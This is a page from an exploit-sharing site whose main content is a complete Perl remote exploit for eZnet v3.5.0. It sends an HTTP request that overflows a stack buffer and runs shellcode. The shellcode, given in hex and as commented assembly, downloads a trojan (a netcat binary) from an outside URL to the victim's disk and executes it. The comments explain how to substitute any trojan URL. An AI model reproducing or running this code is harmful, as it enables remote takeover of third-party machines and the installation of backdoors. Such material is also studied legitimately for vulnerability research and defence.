0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit
================================================================ Eznet v3.5.0 Remote Stack Overflow and Denial of Service Exploit ================================================================ #!/usr/bin/perl -w # # Stack Overflow in eZnet.exe - Remote Exploit # # Will download a trojan from any address which you provide # on the target system, then will execute the trojan. # # For this exploit I have tried several strategies to increase # reliability and performance: # # + Jump to a static 'call esp' # + Backwards jump to code a known distance from the stack pointer # since the stack address seems to change for each version of # eznet. # + Works out the byte difference for custom urls # (must be no longer than 254 bytes!!) # + Causes eznet.exe to restart (not really my choice ;o) # + Shellcode steals addresses from a static module. # # (Shellcode is attached to the bottom of this file!) # # - by Peter Winter-Smith [peter4020@hotmail.com] use IO::Socket; if(!($ARGV[1])) { print "\nUsage: eZnetexploit.pl <victim> <url of trojan>\n" . " + netcat trojan at http://www.elitehaven.net/ncat.exe\n" . " + listens on port 9999.\n\n"; exit; } print "eZnet.exe remote trojan downloader exploit\n"; $victim = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>$ARGV[0], PeerPort=>"80") or die "Unable to connect to $ARGV[0] on port 80"; $tlen = chr(length($ARGV[1]) + 1); $shellcode = "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" . "\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" . "\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" . "\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" . "\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" . "\x13\x57\x8D\x7F\x08\x57\x8D\x7F" . $tlen . "\x57\x8D\x7F\x09\x47\x57\x8D" . "\x54\x24\x14\x52\xEB\x02\xEB\x52" . "\x89\xD6\xFF\x36\xFF\x15\x1C\x91" . "\x04\x10\x5A\x52\x8D\x72\xFC\xFF" . "\x36\x50\xFF\x15\xCC\x90\x04\x10" . "\x5A\x52\x31\xC9\x51\x51\x8D\x72" . "\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" . "\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" . "\xFF\x15\x1C\x91\x04\x10\x5A\x52" . "\x8D\x72\xF8\xFF\x36\x50\xFF\x15" . "\xCC\x90\x04\x10\x5A\x52\x31\xC9" . "\x41\x51\x8D\x72\xF0\xFF\x36\xFF" . "\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" . "\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" . "\x4C\xFF\x55\x52\x4C\x44\x6F\x77" . "\x6E\x6C\x6F\x61\x64\x54\x6F\x46" . "\x69\x6C\x65\x41\xFF\x57\x69\x6E" . "\x45\x78\x65\x63\xFF" . $ARGV[1] . "\xFF" . "\x63\x3A\x5C\x6E\x63\x2E\x65\x78" . "\x65\xFF\x6B\x65\x72\x6E\x65\x6C" . "\x33\x32\x2E\x64\x6C\x6C\xFF"; $jmpcode = "\x89\xE0\x66\x2D\x38\x32\xFF\xE0"; $eip = "\xBB\x33\x05\x10"; $packet = "" . "GET /SwEzModule.dll?operation=login&autologin=" . "\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode . "\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n"; print $victim $packet; print " + Making Request ...\n + Trojan should download - best of luck!\n"; sleep(4); close($victim); print "Done.\n"; exit; #-----------------------------[vampiric.asm]------------------------------ # ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ) # ; (cryptso.dll vampiric shellcode) # ; Url Download + Execute # ; By Peter Winter-Smith # ; [peter4020@hotmail.com] # # bits 32 # # jmp short killnull # # next: # pop edi # # push ebp # mov ebp, esp # add esp, -24 # # push edi # # xor ebx, ebx # mov bl, 07h # mov al, 0ffh # # cld # nullify: # repne scasb # inc byte [edi-01h] # dec bl # cmp bl, 01h # jne nullify # # pop edi # # push edi ; 'URLMON.DLL' # lea edi, [edi+11] # push edi ; 'URLDownloadToFileA' # lea edi, [edi+19] # push edi ; 'WinExec' # lea edi, [edi+08] # push edi ; 'http://www.elitehaven.net/ncat.exe' # lea edi, [edi+35] # push edi ; 'c:\nc.exe' # lea edi, [edi+09] # inc edi # push edi ; 'kernel32.dll' # # lea edx, [esp+20] # push edx # # jmp short over # killnull: # jmp short data # over: # # mov esi, edx # push dword [esi] # # call [1004911ch] ; LoadLibraryA # # pop edx # push edx # lea esi, [edx-04] # push dword [esi] # # push eax # # call [100490cch] ; GetProcAddress("URLMON.DLL", URLDownloadToFileA); # # pop edx # push edx # # xor ecx, ecx # push ecx # push ecx # lea esi, [edx-16] ; file path # push dword [esi] # lea esi, [edx-12] ; url # push dword [esi] # push ecx # # call eax # # pop edx # push edx # # push dword [edx-20] # # call [1004911ch] ; LoadLibraryA # # pop edx # push edx # # # lea esi, [edx-08] # push dword [esi] ; 'WinExec' # push eax ; kernel32.dll handle # # call [100490cch] ; GetProcAddress("kernel32.dll", WinExec); # # pop edx # push edx # # xor ecx, ecx # inc ecx # push ecx # # lea esi, [edx-16] ; file path # push dword [esi] # # call eax # # int3 # # ta: # call next # db 'URLMON.DLL',0ffh # db 'URLDownloadToFileA',0ffh # db 'WinExec',0ffh # db 'http://www.elitehaven.net/ncat.exe',0ffh # ; When altering, you MUST be sure # ; to also alter the offsets in the 0ffh to null # ; byte search! # ; for example: # ; db 'http://www.site.com/someguy/trojan.exe',0ffh # ; count the length of the url, and add one for the 0ffh byte. # ; The above url is 38 bytes long, plus one for our null, is 39 bytes. # ; find the code saying (at the start of the shellcode): # ; push edi ; 'http://www.elitehaven.net/ncat.exe' # ; lea edi, [edi+35] # ; and make it: # ; push edi ; 'http://www.site.com/someguy/trojan.exe' # ; lea edi, [edi+39] # ; same goes for the filename below :o) # db 'c:\nc.exe',0ffh # db 'kernel32.dll',0ffh #------------------------------------------------------------------------- #------------------------------[subcode.asm]------------------------------ # ; eZnet.exe Sub-Shellcode # ; [peter4020@hotmail.com] # # ;100533BBh # # bits 32 # # mov eax, esp # sub ax, 3238h # jmp eax #----------------------------------------------- # 0day.today [2024-12-24] #